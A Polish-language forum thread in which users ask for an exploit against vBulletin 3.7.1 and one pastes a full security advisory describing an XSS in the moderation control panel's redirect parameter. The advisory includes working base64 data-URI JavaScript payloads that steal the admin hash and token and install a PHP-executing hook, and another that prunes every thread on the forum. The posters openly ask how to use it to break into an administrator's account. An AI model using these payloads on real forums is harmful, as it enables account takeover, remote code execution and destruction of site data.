vB

[TuRn]

Witam, macie expoita pod vBulletinŽ Version 3.7.1? Na milw0rm nic nie ma

.

Pozdrawiam.

 

[Kopaczka92]

http://www.haker.com.pl/Szukasz-exploitae-t16185.html
Tu poszukaj..

 

[DarkBlade15]

Mam pytanie czy jest jakiś exploit do vBulletin 3.7.1?
Znalazłem takie cos na google, ale nie wiem o co z tym chodzi

======================================================================

Advisory : XSS in modcp index
Release Date : June 17th 2008
Application : vBulletin
Version : vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1 and lower
Platform : PHP
Vendor URL : [url]http://www.vbulletin.com/[/url]
Authors : Jessica Hope (jessicasaulhope_at_googlemail.com),
Friends who wish to remain anonymous.


=======================================================================

Overview

Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.

=======================================================================

Discussion

The XSS in question exists on the login page for the MCP (moderation
control panel).
The login script takes a redirect parameter that lacks sanitation, allowing
a
rather easy XSS:

http://localhost/vB3/modcp/index.php?redirect={XSS}

What is even better is that the exploit will work outright if the
admin/moderator is already logged in;
if the admin/moderator is not, they will be required to log in.
However, if an admin
logs into the MCP, he is also logged into the ACP, allowing the same
exploit as last time
(remote PHP code injection via the hooks system).

If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates
after
the admin/moderator is logged in. A simple example of the above:

[url]http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcml[/url]
wdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

In this case (as per the last case as well), you have an unlimited and
unaltered XSS space,
so you're free to invoke some AJAX and have fun.
Just to give ideas on how this could turn into something larger,
vBulletin has hooks that operate using eval(), and new hooks can
be added via the ACP itself. It is trivial to write some JS that not only
enables hooks but also inserts a nice RFI hook. Here's one using the data
URI:

data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtL
XVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3
IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3V
wbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3
IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY
3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwi
JykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5
cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YX
J0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oK
TsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NU
JywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF
1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYW
QvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb
2tzXT0xJytoK3RvO3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZh
bHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGV
yKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K

The above will survive a login prompt. It will then, once executed,
proceed
to parse one of the ACP pages and extract the admin hash and token, then
it will enable hooks and add one that executes phpinfo().

Obviously the above requires an admin in this context. Similar techniques
could be used to exploit the modcp as usual, banning users, enabling the
pruning of threads etc.


If you want to cause annoyance, you can esally exploit just a
moderator (and thus have more
success in the exploit being run). This example enables pruning for
all forums on all posts:

data:text/html;base64,PHNjcmlwdD5ldmFsKCJ2PSdodHRwOi8vbG9jYWxob3N0L3ZCL21vZ
GNwL3RocmVhZC5waHA/ZG89Jzt1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQn
O2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz1uZXcgWE1MSHR0cFJlcXV
lc3QoKTtyZWcub3BlbignR0VUJyx2KydwcnVuZScsZmFsc2UpO3JlZy5zZW5kKG51bGwpO3I9cm
VnLnJlc3BvbnNlVGV4dDtoPScmYWRtaW5oYXNoPScrci5zdWJzdHIoci5pbmRleE9mKCdoYXNoX
CInKSsxMywzMik7dG89JyZzZWN1cml0eXRva2VuPScrci5zdWJzdHIoci5pbmRleE9mKCd0b2tl
blwiJykrMTQsNDApO3M9J3RocmVhZFsnO3QyPXMrJ29yaWdpbmFsZGF5c29sZGVyXT0wJicrcys
nb3JpZ2luYWxkYXlzbmV3ZXJdPTAmJytzKydsYXN0ZGF5c29sZGVyXT0wJicrcysnbGFzdGRheX
NuZXdlcl09MCYnK3MrJ3JlcGxpZXNsZWFzdF09MCYnK3MrJ3JlcGxpZXNtb3N0XT0tMSYnK3MrJ
3ZpZXdzbGVhc3RdPTAmJytzKyd2aWV3c21vc3RdPS0xJicrcysnaXNzdGlja3ldPS0xJicrcysn
c3RhdGVdPWFueSYnK3MrJ3N0YXR1c109YW55JicrcysnZm9ydW1pZF09LTEmJytzKydwb3N0ZWR
1c2VyXT0mJytzKyd0aXRsZWNvbnRhaW5zXT0mJytzKydzdWJmb3J1bXNdPTEmdHlwZT1wcnVuZS
Zkbz1kb3RocmVhZHMnK2grdG87cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TV
CcsdisnZG90aHJlYWRzJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7
cjIuc2V0UmVxdWVzdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpO3g9cjIucmVzcG9uc2VUZXh0O3Q
yPSdkbz1kb3RocmVhZHNhbGwmdHlwZT1wcnVuZSYnK2grdG8rJyZjcml0ZXJpYT0nK2VzY2FwZS
goeC5zdWJzdHIoeC5pbmRleE9mKCdyaWEnKSsxMiw3NDcpKS5yZXBsYWNlKC8mcXVvdDsvZywnX
CInKSk7cjI9bmV3IFhNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRz
YWxsJyxmYWxzZSk7cjIuc2V0UmVxdWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVxdWV
zdEhlYWRlcihjLHUpO3IyLnNlbmQodDIpOyIpOzwvc2NyaXB0Pg==

Czy za pomocą tych info o góry można się włamać na konto administratora lub moderatora??

Jeśli tak, to opiszcie jak proszę

 

[abramakabra]

http://gajdaw.pl/varia/xss-cross-site-scripting/

 

[DarkBlade15]

a czy dzięki temu będę mógł wejśc na konto admin'a?